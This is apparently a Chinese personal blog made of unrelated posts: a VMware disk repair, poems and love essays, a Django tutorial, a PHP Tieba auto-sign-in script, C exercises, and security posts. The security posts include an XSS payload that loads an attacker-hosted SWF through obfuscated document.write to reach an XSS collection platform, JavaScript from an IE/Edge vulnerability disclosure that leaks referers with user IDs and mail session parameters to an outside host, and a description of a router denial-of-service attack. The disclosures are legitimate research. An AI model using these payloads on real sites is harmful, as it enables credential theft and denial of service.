由于系统重装,虚拟机也重新安装了一次,当然VM tools也并不可少。
只是当我打开光驱文件,发现里面一个文件都没,开头以为是我VM的问题,若干次重装后发现没有问题。
在网上搜寻的答案中大部分要求移动linux.iso的位置,但是其实并不是这个问题
ls了一下,发现其实是磁盘损坏的
还有可能是tools的硬盘类型在虚拟机种损坏导致的
修复过程:
1, >df -TH #记录目标磁盘的类型,如ext2、ext3.记录挂在盘和挂在目录。如:/dev/sda3 /disk3
2, >umount /dev/sda3 #取消挂载,如提示设备忙,请执行: >fuser -km /dev/sda3
3, >fsck -t ext2 -y /usr/local #修复。”ext2″是第一步查看的磁盘类型。
4, >mount /dev/sda3 /disk3/ #完成挂载
5, >reboot #建议重启。
其中我的磁盘类型是iso9660的
我有一块墓地,风景大好,爱我的人都曾来过
他们帮我豢养豹子,长江,还有一万英尺外的雪山
贴着蕨类的耳朵,我有地衣的心跳。如果我不能比植物更美
阳光将照耀多年,并倾其所照
--------《途说》
一人站在东街口,万人空巷,车水马龙。想起你曾说,这只是你梦想的起点,而我看到的不过是你所想的冰山一角。
细细算来你离开这儿已经有五年了。那时我并不理解你,当你把诗投稿赚取了第一笔稿费,是多么地激动。你骄傲地告诉我说,你要努力凑够钱,一个人去马尔代夫。那时候的你真的有很多做梦都想去的地方,什么法国,意大利,巴厘岛。就像你写的诗歌一样,你要走遍千山万水,漂泊远方。我羡慕你的理想,更被你所打动,可关于远方,我可连想都不敢想!
时间悄无声息的过去了一年,我们的话并不多,偶然的机会你告诉我,你暑期要去当国际义工,目的地是你想去的巴厘岛。你告诉我机会难得,你也因为你的梦想选择了旅游英语这个专业,这有助于你选上巴厘岛的义工,你离你的梦想又近了一步。你曾邀我同行,而我因为英语水平有限,只能望而止步。
很快又过了三五年,我开始期待远方,我盘算着那一万英尺的雪山与遍布地衣的山丘。当我一次次憧憬诉说我梦幻般的理想时候,总会有人告诉我理想与现实的差距,我不以为然,因为我知道那是我要的生活,我会尽最大努力实现它。
我快开始追寻你曾追寻的东西,只是理想来的太晚,等到我有了这种梦想,你却与我不同了。你告诉我你要留在那座西部小城,如民谣所唱般安逸地生活下去,在那座安逸而繁华的城市老去。我寻寻觅觅来到了我们曾指指点点的地方,迎来的确是冷冷清清。阳光照耀着我一侧脸庞,我能体会到那种温柔,晨风吹疼另一侧的脸庞,亦感觉寒冷。
我在想,是时间改变了我们,还是我们改变了彼此。我不明白我何时是对的,这就如同我一人走在这东街口,看到繁华的街道而孤单单一人,不知是来对地方,还是多此一举。一通电话你告诉我,你也很后悔,虽然你现在决定安逸在那座西部小城,但是你也很迷茫。
时间跟我们开了个玩笑,我踏足了那些我曾想都不敢想的地方,忙碌于互联网工作的前沿。而你逐渐安逸,毕业以后开了一家宠物店,每天和小动物打交道,你说你唯一后悔的就是那通电话,你后悔那通电话迟了半年,不然我可能安逸在成都,谁知道呢。
我想爱的形式不仅仅局限于一段时间和一座城市。即便相隔千里,亦能感觉到心的距离,那种穿越时空与跨越空间后无限接近的距离,或是爱的一种。或如你所说,七年后我们各自成婚,我们会各自幸福,并明白真正爱的形式与生命的意义。
今天基友depy丢给我一个xss,输入点如下
<a href="输入点">xx</a> |
很自然而然的,在输入点输入javascript:alert(1)会触发一个弹窗,但是我的朋友无法将信息传输到xss平台,也就是无法利用
http://www.inetsrc.com/test/xsscode.html
我随手丢了一个地址,可是似乎问题没有那么简单。
大概会出现这种情况,我使用jquery引入js,还是使用document.write写入script标签或是eval调用都无法执行js,而可以alert(1)
纠结了好久,后来在调试台发现了一个问题
页面设置阻止了资源的加载,阻止了非同域的资源,这种情况我也是第一次见到,因为这种方法在防御起xss来作用并不大,并且对后期维护比较麻烦。
所以在这种情况下,我们只能把我们整段的js代码放到javascript后面执行。
但是这一种方法很不稳妥,即便代码完整的复制过去,也会有很多小错误等着你去更改,所以为了稳妥,我考虑了使用其他办法。
由于没有编辑swf工具,就使用JPEXS反编译了一下一个poc,将所有代码整合到其中,这样子十分的方便。
<embed src=http://www.inetsrc.com/1.swf allowscriptaccess=always type=application/x-shockwave-flash></embed> |
然后把他上传到我的服务器,如上代码用来盲打的效果更棒,如果没记错,这一个方法可以过掉多数xss的waf。
document.write(String.fromCharCode(60,101,109,98,101,100,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,105,110,101,116,115,114,99,46,99,111,109,47,49,46,115,119,102,32,97,108,108,111,119,115,99,114,105,112,116,97,99,99,101,115,115,61,97,108,119,97,121,115,32,116,121,112,101,61,97,112,112,108,105,99,97,116,105,111,110,47,120,45,115,104,111,99,107,119,97,118,101,45,102,108,97,115,104,62)); |
再用document的方法写入这个标签,当然你也可以使用document.write(‘标签内容’),而我之所以如此是因为这一方法不需要考虑引号的问题。
如此以来我们收到的信息就很正常了,也比较简便快捷。
当然由于第一次遇到这种情况,我后续会更新对这个问题的研究。
首先需要安装环境ipython和pip
sudo apt-get install ipython sudo apt-get install python-pip |
安装完成之后使用pip安装django
sudo pip install django sudo pip install django==1.10.2#也可以指定版本安装 |
创建一个目录用来存放我的第一个应用
mkdir xsseng cd xsseng |
创建一个django应用
django-admin startproject mysite#将它命名为mysite |
为了方便查看结构,安装tree
sudo apt-get install tree |
之后使用tree来查看目录效果如下
sudo apt-get install tree tree |
接着启动mysite
cd mysite python manage.py runserver#这将会让你的应用在本地可以访问,生存环境请使用以下命令 #python manage.py runserver 0.0.0.0:8000 |
DisallowedHost at / 则需要你配置host,你需要使用ctrl+c退出。
cd mysite vim settings.py |
修改成如下
ALLOWED_HOSTS = [ '.example.com', # Allow domain and subdomains '.example.com.', # Also allow FQDN and subdomains ] |
如图就完成了第一个django应用了
误区1
如果你使用了不当的退出方式,可以使用以下方式来关闭django
lsof -i:8000 kill -9 pid |
为了能使用django的默认应用你至少需要为他们创建数据表。
$ python manage.py migrate |
当然如果要使用django的后台你至少需要创建一个超级用户
$ python manage.py createsuperuser |
如图你就可以登陆django的后台了。
或说爱情永恒,或说情比金坚,或说至死不渝。可又有多少人知道,一段爱情背后,是多少人所付出的成全。一断爱,又成全了几多人。
想到爱情如此艰辛,难免心有戚戚,乍一想爱情来之不易,是更应该珍惜这来之不易的爱情。不论成全几多,不悲不喜,一句话。
愿卿明年,侯门朱户。
今天同学问我是否能够用提供cookie,让贴吧自动签到,其实这个功能比较简单。
主要就是一个寻找tbs的过程。
使用php进行请求,再把php文件添加到每天的计划任务就可以了。
那么尝试书写以下代码
<meta charset="utf-8">
<?php
$bd_cookie="";//在这里输入你百度的cookie
//寻找tbs
$fp = fsockopen("tieba.baidu.com", 80, $errno, $errstr, 30);
if (!$fp) {
echo "$errstr ($errno)<br />\n";
} else {
$get_string="";
$out = "GET /home/main?un=aaa HTTP/1.1\r\n";//访问任意用户百度主页以获取tbs。
$out .= "Host: tieba.baidu.com\r\n";
$out .= "Referer: http://tieba.baidu.com/\r\n";
$out .= "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36\r\n";
$out .= "Cookie: ".$bd_cookie."\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$get_string .= fgets($fp,128);//处理返回值
}
fclose($fp);
}
//寻找tbs参数,定位tbs第一次出现的位置并且切割参数,得到最终的tbs
$tb_tbs = substr(strstr($get_string, 'PageData.tbs'),16,26);
//输出tbs,以判断是否获取成功
echo "tbs:".$tb_tbs."<br>";
//开始签到
$post_str="ie=utf-8&tbs=".$tb_tbs;
$content_length = strlen($post_str);
$fps = fsockopen("tieba.baidu.com", 80, $errno, $errstr, 50);
if (!$fps) {
echo "$errstr ($errno)<br />\n";
} else {
$out1 = "POST /tbmall/onekeySignin1 HTTP/1.1\r\n";//签到的API
$out1 .= "Host: tieba.baidu.com\r\n";
$out1 .= "Referer: http://tieba.baidu.com/\r\n";
$out1 .= "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36\r\n";
$out1 .= "Cookie: ".$bd_cookie."\r\n";
$out1 .= "Content-Length: ".$content_length."\r\n";
$out1 .= "Connection: close\r\n\r\n";
$out1 .= $post_str."\r\n\r\n";
fwrite($fps, $out1);
while (!feof($fps)) {
echo fgets($fps,126);//处理返回值
}
fclose($fps);
}
只需要使用如上代码,并且将他添加到计划任务中,就可以实现每天的自动签到了。
学妹勾选了四道题,表示不会做,由于我也想练习一下C语言,于是动手尝试了一下
1.从键盘输入一个字符,输出他的ascii码。
转型输出就可以了。
2.输入一个整型的数字,判断能否被3或7整除,输出YESorNO
3.计算公式
4.找出四个数字中的最小数字。
5.数字排序输出
由于没有安装C的环境,所以没有尝试跑以下代码,可能存在错误。
如果阅读不便,请移步原文地址:http://bobao.360.cn/learning/detail/3612.html
IE这个漏洞提交超过一个月了,微软近几天发布更新。所以才起草了分析文章。不明白的同学可以先看一下去年我明白问题时候,同好友hope探讨后,由他在i春秋发布的一篇文章,以及一些其他的参考资料。
http://bbs.ichunqiu.com/thread-10111-1-1.html https://bugzilla.mozilla.org/show_bug.cgi?id=736871 http://code.google.com/p/chromium/issues/detail?id=168988
Microsoft Edge
Internet Explorer 11
parent.window.opener.location可以使打开他的窗口location跳转到其他的域名,在尝试使用跨域的时候,我首先发现了这个问题,以下是我发现问题时候的测试代码。
parent.window.opener.location = 'http://www.qq.com';
我通过360SRC的友情链接打开了360的appscan,尝试在appscan网页的控制台注入这一段JS,可以看到JS注入后,360SRC的网页变成了腾讯首页。
而就在此时我发现appscan的控制台居然报错了,并且内容属于腾讯首页的资源报错。
如图,我们发现本来不属于appscan站点的错误,显示在了appscan的控制台,随后我在Chrome、Firefox、IE8中测试发现均不存在该问题。
于是第一时间就想到了跨域,会不会存在跨域问题呢?所以很快写了一段代码进行验证,希望能达到跨域执行js,即UXSS,这段代码在同域下可以执行js,但是跨域是不可以的。
function func(){
parent.window.opener.location = 'http://www.qq.com';
}
if (parent.window.opener) {
parent.window.opener.location = 'javascript:alert("xsseng")';setTimeout(func,"3000");
};
浏览器阻止了我的操作,本来问题到这里就应该结束,但是后来发现了其他的问题,当我执行以下代码的时候,我们可以看到如下的HTTP请求中的REFERER。
我们通过appscan站点执行js,referer头却是security站点,这一点是违反了W3C的标准(所有浏览器在这里的处理方式都是appscan站点),为了探究问题是否只是存在于同一个子域下,我把测试站点换到了两个完全不同的域。
function func(){
parent.window.opener.location = 'http://www.inetsrc.com/ref.php';
}
if (parent.window.opener) {
parent.window.opener.location = 'http://i.qq.com';setTimeout(func,"3000");
};
我写了一段代码,来要求i.qq.com请求我的测试站点,以获得QQ空间的来源,其中的ref.php直接输出$_SERVER[“HTTP_REFERER”]。
会发现在测试站点中,不仅可以得到i.qq.com的请求,如果我们登陆QQ空间,那么i.qq.com会跳转到user.qzone.qq.com并且泄露了你的QQ号。那么问题不仅仅会造成更多的CSRF漏洞,如果用户登陆了微博一些邮箱,可以通过控制好setTimeout来获取可以导致用户信息泄露的参数,为此我搭建了https一个测试站点用来测试某邮箱系统,尝试读取SID参数。
function func(){
parent.window.opener.location = 'https://www.esqsm.com/index.php';
}
if (parent.window.opener) {
parent.window.opener.location = 'https://mail.qq.com';setTimeout(func,"3000");
};
由于QQ邮箱配置了SSL,所以接收来源的站点也需要配置SSL。这里由于登陆了QQ邮箱,访问mail.qq.com的时候会跳转到邮箱的首页,导致location的更换,referer就泄露了用户信息。
由于网站的差异,了解邮箱的同学们也知道,在某些特定的接口中,可以让一些参数权限提升,达到登陆邮箱的目的,这包括很多邮箱系统或微博,当然即便你无法做到登陆它,当你获得了一些参数,结合你的漏洞你也可以CSRF做一些高危操作,例如15年我提交过的QQ邮箱(http://bobao.360.cn/learning/detail/672.html)和Coremail的更改密保问题,这都因为他们将防止CSRF的toekn直接放到了地址栏。
当然漏洞危害不仅仅泄露了跳转后的参数与无限制的ref伪造,我们会发现在调试台的资源处,加载了三处的资源,一处调试台共享的三处站点的所有网络请求还有错误信息。而这在其他浏览器与Edge正常情况下是不会存在的,即便你打开了两个以上的页面。
正常的情况,只加载页面本身的性能分析报告
而在漏洞中,性能分析对多个窗口同时进行。
对此我特地准备了一个漏洞检测,以检测你的浏览器是否存在该漏洞。
http://www.inetsrc.com/cvejc0.html
由于js模拟了点击,请允许网页弹出窗口,或者手工点击测试。
如果父窗口在点击后显示“http://www.inetsrc.com/cvejc.html”则漏洞不存在。
360安全播报原文:http://bobao.360.cn/learning/detail/3612.html
https://technet.microsoft.com/zh-cn/library/security/ms17-006.aspx
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0012
https://www.symantec.com/security_response/vulnerability.jsp?bid=96085&om_rssid=sr-advisories
http://www.securityfocus.com/bid/96085/info
感谢一直陪伴我成长的SecBox和我的小伙伴们,如果你们有任何关于漏洞跟进一步利用的思路,恳请留言,我十分渴望与你交流。
我会关注未来推出的版本,并且随时在文章中跟进该漏洞:
2017-02-24 21:39:27 提交了漏洞
2017-02-28 16:58 360忽略了该漏洞
2017-3-2 20:44:23 由于忽略漏洞,所以公告漏洞以避免用户受到该问题困扰。
2017-3-3 20:22 360SRC表示在催促修复该漏洞。
2017-3-9 360确定了该漏洞,会更新该问题。
版本号:V2.0.49.46317正式版
官方下载请戳这里
本站源下载请戳这里
通过该漏洞,在路由器LAN侧(连接到路由器无线热点),且没有路由器管理权的场景下,通过远程发送数据包的方式导致路由器出现拒绝服务。
通过路由器文件app/safety_wireless/webs/tmp/safety_redirection.html获取rand_key后,在计算得到的加密戳,批量发送带有欺诈的answer到app/safety_wireless/webs/auth_info_check.cgi,导致后接入设备被添加到黑名单,出现拒绝服务的问题。
黑客可以通过扫描内网IP,找出新接入设备最可能被赋值IP的区间,发送数据包,导致整个路由器后接入所有设备无法上网;也可以循环扫描新加入设备,定时发送错误5个answer,导致设备拒绝服务
通过未接入设备可以探测内网主机的情况,我们可以得到最后一台主机的IP,在这之后进行新接入设备拒绝服务攻击。
在黑客提前准备好脚本的情况下,任何接入设备还没来得及输入密码,就会被拉黑到黑名单,无法上网。
至于对answer的算法判断为CryptoJs
如果不利用CryptoJs则会返回data_err
所以攻击者只需要写一个扫描内网的脚本,并且批量获取rand_key,进行CryptoJs加密,只需要一直发送数据包,就可以导致360路由器后接入设备无法使用的问题。
MSHTML对js语句处理不当导致请求伪造漏洞,通过漏洞允许客户端自定义任意伪造请求,造成调试信息、调试程序资源共
享等问题。攻击者可以通过构造特定的语句绕过对跨站请求的防护,并且可以通过此漏洞获取敏感信息。
经过测试漏洞存在包括Edge,IE11,360(兼容模式),等浏览器中。
此漏洞在我在调试代码时发现。
2/16/2017 0:15 AM 向微软通报了该漏洞
2/16/2017 6:12 AM 微软分配CASE
3/3/2017 8:59 AM 微软完成了问题调查并修复了这个问题,但是还未部署
15/3/2017 微软发布更新,分配CVE
https://technet.microsoft.com/zh-cn/library/security/ms17-008.aspx
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0012
https://www.symantec.com/security_response/vulnerability.jsp?bid=96085&om_rssid=sr-advisories
http://www.securityfocus.com/bid/96085/info